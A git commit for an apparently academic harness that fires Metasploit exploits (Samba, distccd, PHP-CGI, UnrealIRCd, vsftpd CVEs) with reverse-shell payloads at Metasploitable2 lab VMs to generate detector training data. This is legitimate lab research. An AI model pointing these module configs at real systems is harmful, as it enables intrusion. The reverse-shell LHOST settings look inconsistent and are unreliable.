fleet: rotate exploit modules per (host, slot, ep); Tier 3 by default

Closes the "every run hits the same vulnerability" gap. Before this
commit, the fleet shipped Tier-2 episodes (no exploit at all) with only
the post-infection sample varying. Tier 3 had a single canned module,
vsftpd_234_backdoor, so even when exploit fire was exercised, the entry
vector never changed. The trainer would see one shape of
`armed → infecting` and learn nothing about how varied real exploits
look on the wire or in /proc.

What landed:

exploits/modules/
  + samba_usermap_script.toml       CVE-2007-2447, SMB:139
  + distccd_command_exec.toml       CVE-2004-2687, distcc:3632
  + php_cgi_arg_injection.toml      CVE-2012-1823, http:80
  + unreal_ircd_3281_backdoor.toml  CVE-2010-2075, ircd:6667
  (vsftpd_234_backdoor.toml unchanged)

  All five are canonical Metasploitable2 vectors with stable Metasploit
  modules. Each TOML carries the RPORT the launcher needs to wire its
  hostfwd at, plus a payload tuned to a clean shell session
  (cmd/unix/interact for in-band shells, cmd/unix/reverse* with
  deterministic LPORTs for reverse shells).

exploits/modules.py
  + select_module(catalog, host_id, slot, episode_index): the same
    SHA-256-keyed deterministic selection shape SampleManifest uses for
    samples. Two hosts at the same slot/episode usually hash to
    different modules (collision rate ~1/N); one host covers the full
    catalog given enough episodes.
  + module_target_port(): pulls RPORT off the module config so the
    fleet can plumb the launcher's hostfwd at the right service.

orchestrator/fleet.py
  - _run_slot now decides Tier 3 vs Tier 2 from msfrpcd reachability
    and a populated module catalog. Default is Tier 3 when both hold;
    Tier 2 fallback otherwise (logged and recorded in SlotResult.tier
    so trainers can filter no-exploit episodes).
  - Per-slot module via select_module(): each concurrent slot in a wave
    gets its own hash-selected vector in addition to its own sample.
  - PORT_BASE per slot (target_port + slot * 1000) so concurrent Tier-3
    targets don't collide on the host-side hostfwd port.
  - _msfrpcd_available() probe gates the dispatch.
  - Fleet-side log line records (slot, ep, tier, sample, module,
    run_dir) so the operator can see at a glance what each wave is
    exercising.
  - SlotResult grows tier + module_name fields; FleetConfig grows
    modules + force_tier2 + msfrpcd_{host,port} fields.

orchestrator/episode.py
  + EpisodeConfig.exploit_meta: plain dict the runner stamps into
    meta.exploit so every Tier-3 episode records {framework, module
    path, module type, module name, payload, RPORT, RHOSTS template}.
    Trainers join on meta.exploit.module_name to stratify by entry
    vector and on meta.sample.name to stratify by post-infection
    family.

tools/run_tier3_demo.py
  + Builds exploit_meta from the loaded ModuleConfig and passes it to
    EpisodeConfig. Sample is now also passed (was missing).

tools/run_fleet.py
  + --modules-dir (default exploits/modules/): load module catalog on
    startup; pass to FleetConfig.
  + --force-tier2: escape hatch for dev / smoke tests.
  + JSON output now includes per-slot {tier, module} so the operator
    can see at a glance what each slot ran without grepping logs.

Tests: 129 (was 119). New cases:

test_exploits.py +5
  - catalog has at least the five canonical Metasploitable2 vectors
  - select_module is deterministic per (host, slot, ep)
  - select_module diversifies across hosts
  - select_module walks the full catalog over many episodes
  - module_target_port pulls RPORT for each shipped TOML

test_fleet.py +5
  - _run_slot dispatches to run_tier3_demo.py when msfrpcd up
  - falls back to run_real_vm_demo.py when msfrpcd unreachable
  - falls back when module catalog empty
  - --force-tier2 overrides msfrpcd availability
  - PORT_BASE is unique per concurrent slot (no hostfwd collision)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
2026-04-30 02:22:49 -05:00
commit a193d17ead
parent d86502d950
11 changed files with 451 additions and 22 deletions
--- a/exploits/modules.py
+++ b/exploits/modules.py
@@ -10,10 +10,17 @@ imperative and assume an interactive console; the driver needs the
 *structured* options to push them through msfrpc. TOML is the simplest
 way to express a small typed map of options — and it round-trips
 cleanly into ``meta.json`` for episode reproducibility.
+
+Per-(host, slot, episode) selection mirrors the sample-manifest
+selector: we want different vulnerabilities exercised across hosts
+and waves so the trained model sees a diverse corpus of
+``armed → infecting`` transition shapes, not just the same FTP
+backdoor every run.
 """

 from __future__ import annotations

+import hashlib
 import tomllib
 from dataclasses import dataclass, field
 from pathlib import Path
@@ -95,3 +102,40 @@ def load_module_configs(directory: Path) -> dict[str, ModuleConfig]:
        p.stem: load_module_config(p)
        for p in sorted(directory.glob("*.toml"))
    }
+
+
+def select_module(
+    catalog: dict[str, ModuleConfig],
+    *,
+    host_id: str,
+    slot: int,
+    episode_index: int,
+) -> ModuleConfig:
+    """Deterministic per-(host, slot, ep) module selector. Mirrors
+    SampleManifest.select() so the entry vector rotates the same way
+    the post-infection workload does. Two hosts usually hash to
+    different modules at the same slot/episode (collision rate ~1/N);
+    a single host covers the full catalog given enough episodes.
+
+    Inputs reduce to a SHA-256 keyed lookup so runs replay
+    bit-identically given the same (host, slot, ep) tuple."""
+    if not catalog:
+        raise ValueError("module catalog is empty")
+    keys = sorted(catalog.keys())
+    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
+    h = hashlib.sha256(seed).digest()
+    idx = int.from_bytes(h[:8], "big") % len(keys)
+    return catalog[keys[idx]]
+
+
+def module_target_port(module: ModuleConfig) -> int | None:
+    """Pull the RPORT off a module config. Used by the fleet runner
+    to wire the launcher's hostfwd to the right service inside the
+    target VM (vsftpd:21, samba:139, php-cgi:80, distccd:3632,
+    unrealircd:6667)."""
+    rport = module.options.get("RPORT")
+    if isinstance(rport, int):
+        return rport
+    if isinstance(rport, str) and rport.isdigit():
+        return int(rport)
+    return None
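
A minimal standalone sketch of the selection scheme in this file, assuming a catalog of bare module names in place of ModuleConfig objects. The `pick` and `episodes_to_cover` helpers and the `NAMES` list are illustrative and not part of the repository. The sketch replays the same seed format to show that selection is repeatable, and counts how many episodes one host needs before every module has been picked.

```python
from __future__ import annotations

import hashlib

# Stand-in catalog: names only. The real catalog maps names to ModuleConfig.
NAMES = sorted([
    "vsftpd_234_backdoor",
    "samba_usermap_script",
    "distccd_command_exec",
    "php_cgi_arg_injection",
    "unreal_ircd_3281_backdoor",
])


def pick(host_id: str, slot: int, episode_index: int) -> str:
    """Hypothetical mirror of select_module() over a sorted list of names."""
    seed = f"module|{host_id}|{slot}|{episode_index}".encode()
    digest = hashlib.sha256(seed).digest()
    return NAMES[int.from_bytes(digest[:8], "big") % len(NAMES)]


def episodes_to_cover(host_id: str, slot: int, limit: int = 1000) -> int | None:
    """Episodes needed before every name was picked once, or None if the
    limit is reached first."""
    seen: set[str] = set()
    for ep in range(limit):
        seen.add(pick(host_id, slot, ep))
        if len(seen) == len(NAMES):
            return ep + 1
    return None


# Same tuple, same answer: the selection has no hidden state.
print(pick("lab-7", 2, 11) == pick("lab-7", 2, 11))
print(episodes_to_cover("lab-x", 0))
```

If the hash output behaves like a uniform draw, coverage follows coupon-collector behaviour, so the average is roughly N * (1 + 1/2 + ... + 1/N) episodes, about 11.4 for N = 5, rather than exactly len(catalog).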
--- a/exploits/modules/distccd_command_exec.toml
+++ b/exploits/modules/distccd_command_exec.toml
@@ -0,0 +1,25 @@
+description = """
+distccd v1 unauthenticated command execution (CVE-2004-2687). The
+distcc daemon doesn't verify the source of compile jobs, so a
+crafted DCC_CMD-style request runs an arbitrary command as the
+distccd user. Metasploitable2 ships distccd 2.18.3 listening on
+3632. Returns a low-priv shell — paired with a privesc later if
+needed; for envelope work the unprivileged shell is enough.
+"""
+
+[module]
+type = "exploit"
+path = "unix/misc/distcc_exec"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 3632
+
+[payload]
+path = "cmd/unix/reverse"
+[payload.options]
+LHOST = "{{ target_ip }}"
+LPORT = 4444
+
+[session]
+type = "shell"
--- a/exploits/modules/php_cgi_arg_injection.toml
+++ b/exploits/modules/php_cgi_arg_injection.toml
@@ -0,0 +1,25 @@
+description = """
+PHP-CGI argument injection (CVE-2012-1823). PHP < 5.3.12 in CGI mode
+treats query-string args as command-line flags, letting a crafted
+?-d allow_url_include=1 turn any PHP page into a remote-code-exec.
+Metasploitable2's Apache + php-cgi setup is vulnerable. Returns a
+shell session on whoever runs Apache.
+"""
+
+[module]
+type = "exploit"
+path = "multi/http/php_cgi_arg_injection"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 80
+TARGETURI = "/"
+
+[payload]
+path = "cmd/unix/reverse_perl"
+[payload.options]
+LHOST = "{{ target_ip }}"
+LPORT = 4445
+
+[session]
+type = "shell"
--- a/exploits/modules/samba_usermap_script.toml
+++ b/exploits/modules/samba_usermap_script.toml
@@ -0,0 +1,21 @@
+description = """
+Samba 3.0.20 username-map command injection (CVE-2007-2447). Trigger
+is a crafted username at SMB authentication; the Samba daemon shells
+out via the username_map_script and runs whatever the attacker put in
+the username. Standard Metasploitable2 vector. Returns a root shell
+on the SMB socket — works with cmd/unix/interact.
+"""
+
+[module]
+type = "exploit"
+path = "multi/samba/usermap_script"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 139
+
+[payload]
+path = "cmd/unix/interact"
+
+[session]
+type = "shell"
--- a/exploits/modules/unreal_ircd_3281_backdoor.toml
+++ b/exploits/modules/unreal_ircd_3281_backdoor.toml
@@ -0,0 +1,25 @@
+description = """
+UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075). A modified release
+shipped to the official mirrors carried a backdoor that runs an
+arbitrary command on receipt of a magic AB; payload string. Once
+the backdoor was discovered the official tarball was pulled, but
+Metasploitable2 still ships the trojaned build. Returns a shell on
+the IRC user.
+"""
+
+[module]
+type = "exploit"
+path = "unix/irc/unreal_ircd_3281_backdoor"
+
+[module.options]
+RHOSTS = "{{ target_ip }}"
+RPORT = 6667
+
+[payload]
+path = "cmd/unix/reverse"
+[payload.options]
+LHOST = "{{ target_ip }}"
+LPORT = 4446
+
+[session]
+type = "shell"
--- a/orchestrator/episode.py
+++ b/orchestrator/episode.py
@@ -82,6 +82,10 @@ class EpisodeConfig:
    # into meta.json so trainers can join episodes by family / kind
    # without re-deriving from events. None = v1 yes-loop fallback.
    sample: Sample | None = None
+    # The exploit module that fired (Tier 3+). Plain dict so the runner
+    # doesn't need to import exploits.modules; populated by callers
+    # that have a ModuleConfig in hand.
+    exploit_meta: dict | None = None
    # Snapshot/revert (Tier 0+):
    #   revert_at_start — before any phase walks, loadvm <snapshot_name>.
    #     Use this to drop the guest back to a known-good baseline at
@@ -374,7 +378,7 @@ class EpisodeRunner:
                "ram_mib": None,
                "target_pid": self.cfg.target_pid,
            },
-            "exploit": None,
+            "exploit": self.cfg.exploit_meta,
            "sample": sample_meta,
            "schedule": {
                "baseline_seconds": self.cfg.duration_s,
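
A hedged sketch of the trainer-side join this field enables: grouping episodes by `meta["exploit"]["module_name"]`. The `METAS` list, the `episode_id` key, the sample names, and the "no-exploit" label are illustrative assumptions; only the `exploit` and `sample` keys and the `module_name` field come from this commit.

```python
from collections import defaultdict

# Hand-written stand-ins for parsed meta.json documents (values are made up).
METAS = [
    {"episode_id": "ep-a", "exploit": {"module_name": "samba_usermap_script"},
     "sample": {"name": "miner"}},
    {"episode_id": "ep-b", "exploit": {"module_name": "distccd_command_exec"},
     "sample": {"name": "miner"}},
    {"episode_id": "ep-c", "exploit": {"module_name": "samba_usermap_script"},
     "sample": {"name": "scanner"}},
    # exploit is None when no exploit_meta was supplied (Tier-2 style episode).
    {"episode_id": "ep-d", "exploit": None, "sample": {"name": "scanner"}},
]


def stratify_by_vector(metas: list[dict]) -> dict[str, list[str]]:
    """Group episode ids by entry vector; a None exploit maps to 'no-exploit'."""
    groups: dict[str, list[str]] = defaultdict(list)
    for meta in metas:
        exploit = meta.get("exploit") or {}
        groups[exploit.get("module_name", "no-exploit")].append(meta["episode_id"])
    return dict(groups)


print(stratify_by_vector(METAS))
```

The same pattern keyed on `meta["sample"]["name"]` would stratify by post-infection family instead.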
--- a/orchestrator/fleet.py
+++ b/orchestrator/fleet.py
@@ -38,12 +38,27 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
 from dataclasses import dataclass, field
 from pathlib import Path

+from exploits.modules import (
+    ModuleConfig, load_module_configs, module_target_port, select_module,
+)
 from samples.manifest import Sample, SampleManifest


 log = logging.getLogger("cis490.fleet")


+def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
+    """True when msfrpcd is listening — gate for the Tier-3 default.
+    A Tier-2 fallback runs when msfrpcd isn't there (still useful
+    data, just labeled with no-exploit so the trainer can filter)."""
+    import socket as _sk
+    try:
+        with _sk.create_connection((host, port), timeout=0.3):
+            return True
+    except OSError:
+        return False
+
+
 @dataclass(frozen=True)
 class FleetCapacity:
    cores_total: int
@@ -82,12 +97,21 @@ class FleetConfig:
    repo_root: Path
    data_root: Path
    manifest: SampleManifest
+    # Module catalog for Tier-3 dispatch. Required for fleet-driven
+    # exploit-fire variety; empty catalog forces Tier-2 fallback.
+    modules: dict[str, ModuleConfig] = field(default_factory=dict)
    # VM resource shape — must match what the launcher requests.
    ram_per_vm_mib: int = 320
    # Cap concurrency below the calculated max (e.g. for a smoke test).
    max_concurrent_override: int | None = None
    # Skip episodes whose sample requires a real binary that's not present.
    require_real_samples: bool = False
+    # Force Tier-2 even when msfrpcd is up; used by tests + dev runs
+    # that want a no-exploit baseline.
+    force_tier2: bool = False
+    # msfrpcd connectivity (read by tier-3 driver via env).
+    msfrpcd_host: str = "127.0.0.1"
+    msfrpcd_port: int = 55553


 def _read_meminfo() -> dict[str, int]:
@@ -185,6 +209,8 @@ class SlotResult:
    episode_id: str | None
    rc: int
    duration_s: float
+    tier: str = "tier2"            # "tier3" when an exploit fired
+    module_name: str | None = None  # exploit module identifier (Tier 3 only)
    error: str | None = None
    extra: dict = field(default_factory=dict)

@@ -196,20 +222,29 @@ def _run_slot(
    episode_index: int,
    capacity: FleetCapacity,
 ) -> SlotResult:
-    """Run one Tier-2-shaped episode in a dedicated slot.
+    """Run one episode in a dedicated slot.

-    For now the per-slot driver shells out to ``tools/run_real_vm_demo.py``
-    with SLOT and PROFILE env so the launcher gives us a unique RUN_DIR
-    and the load mimic varies by sample. When the Tier-3/4 paths land,
-    add a sample-kind dispatch here."""
+    Dispatch:
+      - Tier 3 (default when msfrpcd is listening AND a module catalog
+        is populated): real exploit fire via run_tier3_demo.py with a
+        deterministically-selected module + sample.
+      - Tier 2 (fallback): no exploit; the controller drives a labeled
+        workload directly via the serial console. Recorded in
+        SlotResult.tier so trainers can filter the no-exploit episodes.
+    """
    # Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
-    # this, parallel slots rmtree each other's run dir mid-boot —
-    # historic bug that left only one VM per wave actually shipping.
-    run_dir = f"/tmp/cis490-vm-fleet-{slot}"
+    # this, parallel slots rmtree each other's run dir mid-boot.
+    run_dir_base = "/tmp/cis490-vm-fleet"
+
+    # Decide tier.
+    tier3_ready = (
+        not cfg.force_tier2
+        and bool(cfg.modules)
+        and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
+    )

    env = os.environ.copy()
    env["SLOT"] = str(slot)
-    env["RUN_DIR"] = run_dir
    env["SAMPLE_NAME"] = sample.name
    env["SAMPLE_PROFILE"] = sample.profile
    env["SAMPLE_KIND"] = sample.kind
@@ -217,26 +252,64 @@ def _run_slot(
    env["FLEET_EPISODE_INDEX"] = str(episode_index)
    env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)

+    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
+    py = str(venv_py) if venv_py.exists() else "python3"
+
    log_dir = cfg.data_root / "fleet-logs"
    log_dir.mkdir(parents=True, exist_ok=True)
    out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"

-    # Prefer the venv python so the subprocess gets the same deps as
-    # the parent (msgpack, httpx, pycdlib, …). Fall back to
-    # /usr/bin/env python3 if the venv layout differs.
-    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
-    py = str(venv_py) if venv_py.exists() else "python3"
+    if tier3_ready:
+        module = select_module(
+            cfg.modules,
+            host_id=cfg.host_id, slot=slot, episode_index=episode_index,
+        )
+        target_port = module_target_port(module) or 21
+        # Per-slot runner dir for the target VM.
+        run_dir = f"{run_dir_base}-target-{slot}"
+        env["RUN_DIR"] = run_dir
+        # Each slot gets a unique host-side hostfwd port so concurrent
+        # targets don't collide on the loopback port.
+        env["PORT_BASE"] = str(target_port + slot * 1000)
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--module", module.name,
+            "--sample", sample.name,
+            "--target-port", str(target_port + slot * 1000),
+        ]
+        tier = "tier3"
+        module_name: str | None = module.name
+    else:
+        run_dir = f"{run_dir_base}-{slot}"
+        env["RUN_DIR"] = run_dir
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--sample", sample.name,
+        ]
+        tier = "tier2"
+        module_name = None
+        if not cfg.force_tier2 and not cfg.modules:
+            log.warning("slot=%d falling back to Tier 2: empty module catalog", slot)
+        elif not cfg.force_tier2:
+            log.warning("slot=%d falling back to Tier 2: msfrpcd unreachable at %s:%d",
+                        slot, cfg.msfrpcd_host, cfg.msfrpcd_port)
+
+    log.info(
+        "slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
+        slot, episode_index, tier, sample.name, module_name, run_dir,
+    )

    started = time.monotonic()
    try:
        with out_log.open("ab") as logf:
            proc = subprocess.run(
-                [
-                    py,
-                    str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
-                    "--data-root", str(cfg.data_root),
-                    "--run-dir", run_dir,
-                ],
+                cmd,
                cwd=str(cfg.repo_root),
                env=env,
                stdout=logf,
@@ -254,9 +327,11 @@ def _run_slot(
        slot=slot,
        sample_name=sample.name,
        sample_kind=sample.kind,
-        episode_id=None,  # parsed from the log later by the driver
+        episode_id=None,
        rc=rc,
        duration_s=duration,
+        tier=tier,
+        module_name=module_name,
        error=err,
    )
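
A small sketch of the PORT_BASE arithmetic used in the Tier-3 branch (`target_port + slot * 1000`), worked for the five shipped RPORTs. The service labels and the `port_notes` helper are illustrative. Whether the launcher binds PORT_BASE directly is not visible in this diff, so the "privileged" and "out-of-range" notes are assumptions about how the value is consumed.

```python
# RPORTs from the shipped module TOMLs; the keys are labels for this sketch.
RPORTS = {"vsftpd": 21, "http": 80, "smb": 139, "distcc": 3632, "ircd": 6667}
STRIDE = 1000  # per-slot offset applied by the fleet


def port_base(target_port: int, slot: int) -> int:
    """Same arithmetic as the fleet: target_port + slot * 1000."""
    return target_port + slot * STRIDE


def port_notes(port: int) -> list[str]:
    """Flag values that may be awkward if bound directly on the host."""
    notes = []
    if port < 1024:
        notes.append("privileged")    # often needs elevated rights to bind
    if port > 65535:
        notes.append("out-of-range")  # not a valid TCP port
    return notes


# No two shipped RPORTs differ by a multiple of 1000, so every
# (service, slot) pair lands on a distinct value.
ports = [port_base(p, s) for p in RPORTS.values() for s in range(8)]
print(len(ports) == len(set(ports)))  # prints: True

for service, slot in [("vsftpd", 0), ("distcc", 2), ("ircd", 59)]:
    port = port_base(RPORTS[service], slot)
    print(service, slot, port, port_notes(port))
# prints:
# vsftpd 0 21 ['privileged']
# distcc 2 5632 []
# ircd 59 65667 ['out-of-range']
```

Under these assumptions, slot 0 maps low RPORTs such as 21, 80 and 139 onto themselves, and very high slot numbers can exceed the TCP port range; a fixed base offset would be one way to sidestep both, if the launcher needs it.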

--- a/tests/test_exploits.py
+++ b/tests/test_exploits.py
@@ -26,6 +26,27 @@ MODULES_DIR = REPO_ROOT / "exploits" / "modules"
 # Module config loader
 # -----------------------------------------------------------------------

+def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
+    """The fleet's entry-vector variety depends on the module catalog
+    being populated. Five Metasploitable2 vectors is the minimum
+    that gives the trainer a non-trivial diversity of armed →
+    infecting transition shapes."""
+    from exploits.modules import load_module_configs
+    catalog = load_module_configs(MODULES_DIR)
+    assert len(catalog) >= 5, \
+        f"only {len(catalog)} modules; need at least 5 for fleet variety"
+    names = set(catalog.keys())
+    expected = {
+        "vsftpd_234_backdoor",
+        "samba_usermap_script",
+        "distccd_command_exec",
+        "php_cgi_arg_injection",
+        "unreal_ircd_3281_backdoor",
+    }
+    missing = expected - names
+    assert not missing, f"missing canonical modules: {missing}"
+
+
 def test_load_vsftpd_module_config_round_trip() -> None:
    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
    assert cfg.name == "vsftpd_234_backdoor"
@@ -44,6 +65,46 @@ def test_render_options_substitutes_target_ip() -> None:
    assert rendered["PAYLOAD"] == "cmd/unix/interact"


+def test_select_module_is_deterministic() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
+    assert a is b
+
+
+def test_select_module_diversifies_across_hosts() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    matches = 0
+    for slot in range(20):
+        a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
+        b = select_module(catalog, host_id="bob",   slot=slot, episode_index=0)
+        if a is b:
+            matches += 1
+    assert matches < 15, "host_id seed isn't producing module variety"
+
+
+def test_select_module_walks_catalog() -> None:
+    from exploits.modules import load_module_configs, select_module
+    catalog = load_module_configs(MODULES_DIR)
+    seen = set()
+    for ep in range(200):
+        seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
+    assert seen == set(catalog.keys()), \
+        f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"
+
+
+def test_module_target_port_pulls_rport() -> None:
+    from exploits.modules import load_module_configs, module_target_port
+    catalog = load_module_configs(MODULES_DIR)
+    assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
+    assert module_target_port(catalog["samba_usermap_script"]) == 139
+    assert module_target_port(catalog["distccd_command_exec"]) == 3632
+    assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
+    assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667
+
+
 def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
    p = tmp_path / "x.toml"
    p.write_text(
--- a/tests/test_fleet.py
+++ b/tests/test_fleet.py
@@ -189,6 +189,133 @@ def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
        SampleManifest.load(p)


+# ---------------------------------------------------------------------------
+# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
+# ---------------------------------------------------------------------------
+
+
+class _RecordingPopen:
+    """Replacement for subprocess.run that just records what it would
+    have invoked. Returns a returncode-0 result."""
+    calls: list[dict] = []
+
+    def __init__(self, args, **kwargs) -> None:
+        # Mimic CompletedProcess shape.
+        type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
+        self.returncode = 0
+        self.stdout = b""
+        self.stderr = b""
+
+
+def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
+    from exploits.modules import load_module_configs
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+
+    repo_root = REPO_ROOT
+    return fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=repo_root,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
+        modules=load_module_configs(repo_root / "exploits" / "modules"),
+        force_tier2=force_tier2,
+    )
+
+
+def _patch_subprocess(monkeypatch):
+    from orchestrator import fleet
+    _RecordingPopen.calls = []
+    monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
+
+
+def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier3", res
+    assert res.module_name in cfg.modules
+    cmd = _RecordingPopen.calls[-1]["args"]
+    # The Tier-3 runner is what gets invoked.
+    assert any("run_tier3_demo.py" in str(a) for a in cmd)
+    # The module name is plumbed through.
+    assert "--module" in cmd
+    assert res.module_name in cmd
+
+
+def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+
+    assert res.tier == "tier2"
+    assert res.module_name is None
+    cmd = _RecordingPopen.calls[-1]["args"]
+    assert any("run_real_vm_demo.py" in str(a) for a in cmd)
+
+
+def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    from samples.manifest import SampleManifest
+    cfg = fleet.FleetConfig(
+        host_id="test-host",
+        repo_root=REPO_ROOT,
+        data_root=tmp_path,
+        manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
+        modules={},  # explicitly empty
+    )
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    assert res.tier == "tier2"
+
+
+def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
+    """Concurrent Tier-3 slots can't share the host-side hostfwd port
+    or all targets stomp on each other's vsftpd:21 → 21 mapping. The
+    fleet must shift PORT_BASE per slot."""
+    from orchestrator import fleet
+    cfg = _fleet_cfg_with_modules(tmp_path)
+    monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
+    _patch_subprocess(monkeypatch)
+    capacity = fleet.detect_capacity()
+
+    sample = cfg.manifest.samples[0]
+    fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
+    fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
+
+    port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
+    assert len(set(port_bases)) == len(port_bases), \
+        f"PORT_BASE collision across slots: {port_bases}"
+
+
 def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
    p = tmp_path / "real.toml"
    p.write_text(
--- a/tools/run_fleet.py
+++ b/tools/run_fleet.py
@@ -23,6 +23,7 @@ from pathlib import Path
 # Allow running as a script.
 sys.path.insert(0, str(Path(__file__).resolve().parent.parent))

+from exploits.modules import load_module_configs  # noqa: E402
 from orchestrator.fleet import (  # noqa: E402
    FleetConfig, FleetRunner, capacity_report, detect_capacity,
 )
@@ -36,10 +37,14 @@ def main(argv: list[str] | None = None) -> int:
    p.add_argument("--max-concurrent", type=int, default=None)
    p.add_argument("--manifest",
                   default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"))
+    p.add_argument("--modules-dir",
+                   default=str(Path(__file__).resolve().parent.parent / "exploits" / "modules"))
    p.add_argument("--data-root", default="data")
    p.add_argument("--host-id", default=os.environ.get("FLEET_HOST_ID") or os.uname().nodename)
    p.add_argument("--ram-per-vm-mib", type=int, default=320)
    p.add_argument("--require-real-samples", action="store_true")
+    p.add_argument("--force-tier2", action="store_true",
+                   help="Skip Tier 3 even when msfrpcd is reachable")
    p.add_argument("--log-level", default="INFO")
    args = p.parse_args(argv)

@@ -54,15 +59,19 @@ def main(argv: list[str] | None = None) -> int:

    manifest = SampleManifest.load(args.manifest)
    repo_root = Path(__file__).resolve().parent.parent
+    modules_dir = Path(args.modules_dir)
+    modules = load_module_configs(modules_dir) if modules_dir.exists() else {}

    cfg = FleetConfig(
        host_id=args.host_id,
        repo_root=repo_root,
        data_root=Path(args.data_root).resolve(),
        manifest=manifest,
+        modules=modules,
        ram_per_vm_mib=args.ram_per_vm_mib,
        max_concurrent_override=args.max_concurrent,
        require_real_samples=args.require_real_samples,
+        force_tier2=args.force_tier2,
    )

    runner = FleetRunner(cfg)
@@ -77,11 +86,14 @@ def main(argv: list[str] | None = None) -> int:
    print(json.dumps({
        "host_id": args.host_id,
        "capacity": result.capacity.to_dict(),
+        "modules_loaded": sorted(modules.keys()),
        "slots": [
            {
                "slot": s.slot,
                "sample": s.sample_name,
                "sample_kind": s.sample_kind,
+                "tier": s.tier,
+                "module": s.module_name,
                "rc": s.rc,
                "duration_s": s.duration_s,
                "error": s.error,
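
A sketch of consuming the runner's JSON output, assuming only the per-slot fields visible in the hunk above (`slot`, `tier`, `module`, `rc`). The `RAW` document and its values are hand-written for illustration, and `summarize` is a hypothetical helper; the real output carries more keys.

```python
import json
from collections import Counter

# Hand-written example in the shape printed by the runner (values made up).
RAW = json.dumps({
    "host_id": "lab-7",
    "modules_loaded": ["distccd_command_exec", "samba_usermap_script"],
    "slots": [
        {"slot": 0, "sample": "s0", "tier": "tier3",
         "module": "samba_usermap_script", "rc": 0},
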